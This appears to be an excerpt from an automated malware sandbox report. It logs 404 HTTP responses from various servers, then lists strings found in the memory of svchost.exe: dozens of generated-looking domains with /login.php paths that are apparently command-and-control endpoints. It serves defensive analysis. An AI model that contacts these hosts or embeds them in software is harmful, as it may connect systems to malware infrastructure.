    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:59:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.4",amp_style_sanitizer;dur="21.0",amp_tag_and_attribute_sanitizer;dur="17.8",amp_optimizer;dur="7.3"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP29DjZxQIHlIhf0dMgASlOMmyAkTcyB9GOHriyvsBeehzRJFaESz6LmLY%2FVVTOPapE9KebJxAHE0kOxpxFKJyjy7Q5Y%2BZsCEIo1d%2B8CJ8v8LknzCir%2BKfK6u4ehtw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0e622d134370-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:59:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="61.2",amp_style_sanitizer;dur="27.2",amp_tag_and_attribute_sanitizer;dur="23.1",amp_optimizer;dur="8.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2xp2Lim%2F7gWUSjjI34R0T7KDe04gNt1BGkt21KYSyFIUP%2BKzR7uzm1DY08ixbVqhQm0HECsZoxlYj7VHPPPN93vcaQEQSXGX7Nr9UvnUTH%2FQCcNum6L%2FxXsN%2BQh9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0e6cbf60437a-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKMOtInikg0%2FmNHHQjSa49%2BaG%2B%2FWmcxlBrd%2FJK%2FqI3MUNWI4xIZAyqv5YWv%2F%2Bi8RZ9Wao8W%2FOqX682yXHh7lHwBL6c%2FTE2PmEaf98c3U9%2FcqO2xUfPVnSakNVM9trg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0f6ecafd19bf-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="48.1",amp_style_sanitizer;dur="23.8",amp_tag_and_attribute_sanitizer;dur="20.7",amp_optimizer;dur="8.0"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUraIUkIVKiNmoYlZk76JgBK02AKSk%2B6%2Fwdt5%2Btu5QDCOlNazCg9Lm2ohHB1sxmCYlJyaJhYwqki9dwzps7A6HhXAfNwUNdbtoImT4%2Ff%2BNovyW4XQQGZ5tGYrdxGUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0f9e9d880f98-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="21.1",amp_tag_and_attribute_sanitizer;dur="18.6",amp_optimizer;dur="5.9"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaujCRDVApxRtyGuqSoVE2Cno6mVxbWRnDQjHD6R8nsFDl9UMYPqIPMP7vbrYn%2BJCcl9DPbZpM1x4NaXTzG7gpK6Pmhi9UMUfa%2FfwBakrV%2FXXXteLlNgewzCPDlwhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0fac4fe80f83-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 06:58:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Sun, 08 Sep 2024 06:58:44 GMT; Content-Length: 1245
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 06:58:45 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 06:58:46 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 06:59:56 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 06:59:57 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Sun, 08 Sep 2024 07:00:10 GMT; Content-Length: 1245
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 07:00:11 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 07:00:12 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 07:00:12 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 07:00:11 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 07:00:12 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 07:00:12 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Sun, 08 Sep 2024 07:00:12 GMT; Content-Length: 1245
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 07:00:21 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 07:00:22 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 07:00:25 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 07:00:26 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyneh.com/login.php
    Source: svchost.exe, 00000001.00000003.2646318980.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2628700713.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797346749.000000000724A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadynub.com/
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830122239.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2615600857.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617620564.000000000BEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypub.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803932865.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801875139.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795036771.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyrab.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599995293.000000000BE25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyh.com/login.php
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979374488.0000000007212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhiz.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynuw.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynuw.com/login.php8
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqas.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/
